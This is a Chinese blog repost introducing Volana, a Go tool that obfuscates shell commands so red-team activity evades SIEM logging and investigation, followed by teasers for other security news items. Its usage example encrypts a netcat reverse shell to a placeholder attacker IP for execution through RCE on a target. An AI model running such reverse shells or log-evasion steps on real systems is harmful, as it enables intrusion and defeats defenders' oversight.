Volana:一款基于Go开发的Shell命令代码混淆工具

于 2024-08-09 16:00:00 发布
阅读量1k 收藏 16
点赞数 11
分类专栏: 工具 文章标签: golang 开发语言 后端
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/FreeBuf_/article/details/141057401
版权

关于Volana

Volana是一款功能强大的Shell命令代码混淆工具,该工具基于Go语言开发,可以帮助广大研究人员实现对Shell命令或脚本代码的混淆处理。

在红队测试过程中,隐蔽性是非常重要的一个方面,许多基础设施会记录命令并实时将其发送到 SIEM,这使得事后清理部分本身毫无用处。Volana通过提供自己的 shell 运行时(输入你的命令,volana 会为你执行),提供一种在目标设备上执行的命令的隐蔽且简单的方法。

工具要求

Go环境

工具安装

由于该工具基于Go开发,因此我们首先需要在本地设备上安装并配置好最新版本的Go运行环境。

接下来,广大研究人员可以直接使用下列命令将该项目源码克隆至本地:

git clone https://github.com/ariary/volana.git

或者直接使用下列命令下载并安装最新的Volana发布版本:

curl -lO -L https://github.com/ariary/volana/releases/latest/download/volana

执行下列命令即可运行Volana:

./volana

volana » echo "Hi SIEM team! Do you find me?" > /dev/null 2>&1  

volana » [command]

工具使用

volana 控制台命令:

ring:启用环形模式,即每个命令都与许多其他命令一起启动以掩盖踪迹(来自监控系统调用的解决方案)

exit:退出 volana 控制台

非交互式shell使用

假设您有一个非交互式 shell(例如webshell),您就可以使用encrypt或decrypt子命令了。不过在此之前,您需要配置并使用嵌入式加密密钥进行volana的代码构建。

在测试人员设备傻姑娘执行下列命令:

make build.volana-with-encryption

volana encr "nc [attacker_ip] [attacker_port] -e /bin/bash"

>>> ENCRYPTED COMMAND

复制加密的命令,并在目标机器上使用 rce 执行它

./volana decr [encrypted_command]

注意事项

为什么不直接使用“echo [command] | base64”来隐藏命令,然后在目标设备上使用“echo [encoded_command] | base64 -d | bash”来解码呢?

因为我们希望受到保护,免受触发base64使用警报或在命令中寻找 base64 文本的系统的影响。我们还想让调查变得困难,而 base64 并不是真正的阻碍。

许可证协议

本项目的开发与发布遵循Unlicense开源许可协议。

项目地址

Volana:【GitHub传送门

参考资料

https://github.com/annmuor/zn2021_8ways

https://github.com/mufeedvh/moonwalk

FreeBuf-
关注
  • 11
    点赞
  • 16
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
博客
Mandrake间谍软件再次潜入Google Play长达两年之久
08-09 614
2020年5月,Bitdefender发布了一份白皮书,其中详细分析了一种复杂的安卓网络间谍软件Mandrake。2024年4月,卡巴斯基的研究人员发现了一个可疑样本,似乎是Mandrake的新版本。随后的分析显示,从2022年到2024年,多达5个携带Mandrake间谍软件的应用程序在Google Play上可用,总安装量已超3.2万次,却未被任何其他供应商发现。
博客
Black Hat USA 2024:微软AI助手Copilot安全隐患曝光
08-08 1010
在Black Hat USA 2024,一位研究人员披露了微软AI助手Copilot存在的多个安全隐患,攻击者能够借此漏洞窃取敏感数据和企业凭证。微软声称,通过将任务委派给AI助手Copilot,每天可以节省数百小时的工作时间。Copilot是微软在2023年2月推出的AI驱动助手,它允许企业构建和训练自己的AI助手,使得微软应用程序中的任务自动化。Copilot基于大型语言模型,能够接受文本、图像和语音输入,并在新的Windows 11 PC和Copilot PC上运行。
博客
Ashok:一款多功能开源网络侦查OSINT工具
08-08 936
2、Google Dorking(无限制)3、Github信息收集/爬取4、子域名识别功能5、内容管理系统/开发技术检测(支持自定义Header)
博客
揭秘新型安卓间谍软件LianSpy的攻击手段
08-07 455
Kalinin表示:“除了收集通话记录和应用列表等标准间谍行为外,它还利用root权限进行隐蔽的屏幕录制,避开安全检查,其依赖重命名的su二进制文件,暗示了初次入侵后的二次感染。目前尚不清楚该间谍软件的传播方式,但卡巴斯基推测,它可能是通过未知的安全漏洞或是直接接触目标手机来部署的,这些带有恶意软件的应用程序看起来像是支付宝或安卓系统的一个服务。并且,收集的数据以加密形式存储在SQL数据库中,指定记录类型和SHA-256哈希值,只有拥有相应私有RSA密钥的攻击者才能解密窃取的信息。
博客
Apache OFBiz 曝出严重漏洞,允许预身份验证 RCE
08-06 506
近日,研究人员发现 Apache OFBiz 中存在一个新的关键漏洞,该漏洞是 Apache OFBiz 中的一个错误授权问题,被追踪为CVE-2024-38856。SonicWall 的安全研究员 Hasib Vhora 与其他安全专家在公告中写道:如果满足某些先决条件,如屏幕定义没有明确检查用户的权限,因为它们依赖于终端的配置,那么未经验证的终端可能允许执行屏幕的屏幕渲染代码。该问题源于身份验证机制中的一个漏洞,它允许未经身份验证的用户访问通常仅限已登录用户使用的功能,从而可能导致远程代码执行。
博客
CyberChef:用于加密、编码、压缩和数据分析的网络瑞士军刀
08-06 831
1、解码 Base64 编码的字符串2、将日期和时间转换为不同的时区3、解析 Teredo IPv6 地址4、从十六进制转储转换数据,然后解压缩5、解密并反汇编 shellcode6、将多个时间戳显示为完整日期7、对不同类型的数据进行不同的操作8、使用输入的部分作为操作的参数9、执行 AES 解密,从密码流的开头提取 IV10、自动检测多层嵌套编码。
博客
如何使用pwned检测自己是否已被渗透或数据泄露
08-05 1023
pwned是一款功能强大的网络安全检测工具,该工具基于命令行实现,可以帮助广大安全研究人员检测自己的设备系统是否已被渗透,或发生了数据泄露。pwned ba 获取帐户(用户名或电子邮件地址)的所有数据泄露。pwned pa 获取账户(电子邮件)中的所有数据。pwned breaches 获取所有的数据泄露信息。其他命令不需要 API 密钥,我们可以在不获取密钥的情况下使用它们。
博客
攻击者正滥用Cloudflare隧道传播恶意软件并逃避检测
08-05 253
攻击的最初载体是一封包含 ZIP 压缩文件的网络钓鱼电子邮件,该压缩文件包含一个 URL 快捷方式文件,可将收件人引向一个的WebDAV 服务器上的 Windows 快捷方式文件,该服务器由 TryCloudflare 托管代理。去年,Sysdig首次记录了利用TryCloudflare进行恶意攻击的情况,一个被称为LABRAT的加密劫持和代理劫持活动通过GitLab中一个现已打补丁的关键漏洞,利用Cloudflare隧道渗透目标并掩盖其命令与控制(C2)服务器。
博客
Radamsa:一款高性能通用模糊测试工具
08-02 1196
默认情况下,如果未指定特定的随机状态,Radamsa将从 /dev/urandom 中获取随机种子,并且每次启动时通常都会看到不同的结果,但对于较小的输入,可能会经常看到相同的结果或原始结果。其目标是无论程序处理哪种数据(无论是xml还是mp3),都能发现问题,反之,如果找不到错误,则意味着其他类似工具可能也找不到。Radamsa是一款高性能的通用模糊测试工具,广大研究人员可以将其当作一个应用程序稳定性测试的测试用例生成工具。工具无法保证所有的输出都是唯一的,但相同的输出结果情况还是很罕见的。
博客
攻击者劫持 Facebook 页面用于推广恶意 AI 照片编辑器
08-02 1037
近日,有攻击者劫持了 Facebook 上的网页,诱骗用户下载一个合法的人工智能(AI)照片编辑器,但实际上他们真正下载的却是一个专门用以盗取用户的凭据信息窃取程序。趋势科技的研究人员发现的这一恶意广告活动利用了人工智能的流行性,并结合了各种流行的威胁策略,包括网络钓鱼、社交工程和以恶意方式使用合法工具。最终的有效载荷是 Lumma 窃取器,它的目标是敏感信息,包括用户凭据、系统详细信息、浏览器数据和扩展。
博客
Mallet:一款针对任意协议的安全拦截代理工具
08-01 1331
在Netty世界中,处理程序实例提供帧分隔(即消息从哪里开始和结束)、协议解码和编码(将字节流转换为Java对象,然后再转换回来,或者将字节流转换为不同的字节流),以及更高级别的逻辑。由于Mallet是建立在Netty框架之上的,因此一旦使用 Mallet制作了管道原型,我们就可以毫不费力地将代码迁移到普通的Netty应用程序中。Mallet是一款功能强大的协议安全分析工具,该工具支持针对任意协议创建用于安全审计的拦截代理,该工具本质上与我们所熟悉的拦截Web代理类似,只是通用性更强。
博客
继全球蓝屏后,微软 Azure 云服务因安全错误导致全球宕机
08-01 1019
这次攻击影响了Azure的多个服务,包括Azure应用服务、Azure物联网中心、应用洞察、日志搜索警报和Azure策略,以及主要的Azure门户,Microsoft 365和Microsoft Purview数据保护服务的一部分。有安全专家指出,DDoS的趋势通常是周期性的,但目前的趋势是攻击规模越来越大,持续时间越来越短。一个令人费解的结果是,虽然此次触发事件是DDoS攻击,但更关键的原因是微软Azure云服务的DDoS保护机制被激活,防御实施中的错误放大了攻击的影响,而不是降低攻击影响。
博客
GenAI账户凭证被盗,暗网每日交易量达400条
07-31 402
报告还提到了激进的数据收集行为和供应链风险,比如OpenAI在2023年遭遇的数据泄露事件,凸显了这些平台的脆弱性。被盗的GenAI凭证可能使攻击者获得公司敏感信息的访问权,包括客户数据、财务记录、知识产权和员工的个人可识别信息(PII)。该市场已于最近关闭,但它的存在突显了问题的严重性,被盗密钥的广告价格低至15美元。据eSentire介绍,每天大约有400个GenAI账户凭证在暗网平台上交易,包括GPT、Quillbot、Notion、HuggingFace和Replit等平台的凭证。
博客
kvm-fuzz:使用KVM技术对闭源用户空间二进制文件执行模糊测试
07-31 1303
虚拟化是云计算的基础,一种资源管理技术,是将计算机的各种实体资源(CPU、内存、磁盘空间、网络适配器等)做虚拟化、将虚拟化后的整体做为一个可供分割且组合的操作系统。服务器虚拟化是云计算最核心的技术,而KVM是当前最主流的开源的服务器虚拟化技术。KVM 全称是 Kernel-Based Virtual Machine,基于Linux内核的虚拟化技术。KVM基于Linux内核实现,属于半虚拟化的Hypervisor。
博客
drs-malware-scan:利用AWS服务对本地服务器执行恶意软件扫描
07-30 501
如果没有,请查看此文档。1、AWS Elastic Disaster Recovery (AWS DRS)使用经济实惠的存储、最少的计算和时间点恢复快速、可靠地恢复本地和基于云的应用程序,从而最大限度地减少停机时间和数据丢失;2、Amazon GuardDuty是一种威胁检测服务,可持续监控您的AWS账户和工作负载是否存在恶意活动,并提供详细的安全发现以供查看和补救;drs-malware-scan是一款功能强大的恶意软件扫描工具,该工具可以利用AWS服务对本地部署的服务器执行基于文件的恶意软件扫描任务。
博客
微软:警惕利用VMware ESXi进行身份验证绕过攻击
07-30 442
到目前为止,该漏洞已被被追踪为 Storm-0506、Storm-1175、Octo Tempest 和 Manatee Tempest 的勒索软件运营商在野外利用,并在攻击中部署了Akira和Black Basta勒索软件。虽然成功实施攻击需要对目标设备和用户交互具有高权限,但微软表示,已有几个勒索软件团伙利用漏洞完全掌控了管理员权限,窃取存储在托管虚拟机上的敏感数据,在受害者的网络中横向移动,并加密 ESXi 虚拟机管理程序的文件系统。以Storm-0506为例的ESXi 攻击链。
博客
Cookie-Monster:一款针对Web浏览器的安全分析与数据提取工具
07-29 507
Cookie-Monster适用于红队和蓝队成员,能够提取WebKit主密钥,找到具有Cookie和登录数据文件句柄的浏览器进程,然后复制句柄,并将相关数据下载并保存至本地。--chrome 会查看所有正在运行的进程和句柄,如果其中一个与chrome.exe匹配,它会将句柄复制到Cookies/Login Data,然后将文件复制到CWD;--edge 会查看所有正在运行的进程和句柄,如果其中一个与msedge.exe匹配,它会将句柄复制到Cookies/Login Data,然后将文件复制到CWD;
博客
“PKFail”漏洞威胁:数百万设备安全启动机制遭绕过风险
07-29 500
darkreading网站消息,攻击者可以绕过数百万基于英特尔和ARM微处理器的计算系统(来自多家厂商)的安全启动过程,因为它们共享了一个在设备启动过程中使用的、之前已经泄露的加密密钥。美国AMI公司提供的所谓平台密钥PK (Platform Key)在安全启动的个人电脑启动链中扮演信任根的角色,用于验证设备固件和启动软件的真实性和完整性。不幸的是,固件安全供应商Binarly的研究人员发现,该密钥已在2018年的一次数据泄露事件中被曝光。
博客
NimScan:一款运行效率极高的端口扫描工具
07-26 841
NimScan是一款运行效率极高的网络安全工具,该工具基于Nim语言开发,集网络扫描、端口扫描和主机发现等功能于一身,支持快速扫描目标网络的活动主机,识别开放端口和服务信息,为渗透测试和网络安全评估提供支持。-a, --all 使用原始套接字扫描已过滤/关闭/打开的端口。-p, --ports 要扫描的端口 [默认: 1-65,535]-t, --threads 每次扫描所使用的线程数量。~3 秒(Linux)~8 秒(Linux)
博客
LangChain曝关键漏洞,数百万AI应用面临攻击风险
07-26 374
LangChain是一个流行的开源生成式人工智能框架,其官网介绍,有超过一百万名开发者使用LangChain框架来开发大型语言模型(LLM)应用程序。LangChain的合作伙伴包括云计算、人工智能、数据库和其他技术开发领域的许多知名企业。近日,来自Palo Alto Networks的研究人员详细描述了LangChain中的两个重大安全漏洞。这些漏洞被识别为CVE-2023-46229和CVE-2023-44467,它们有可能允许攻击者执行任意代码和访问敏感数据。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值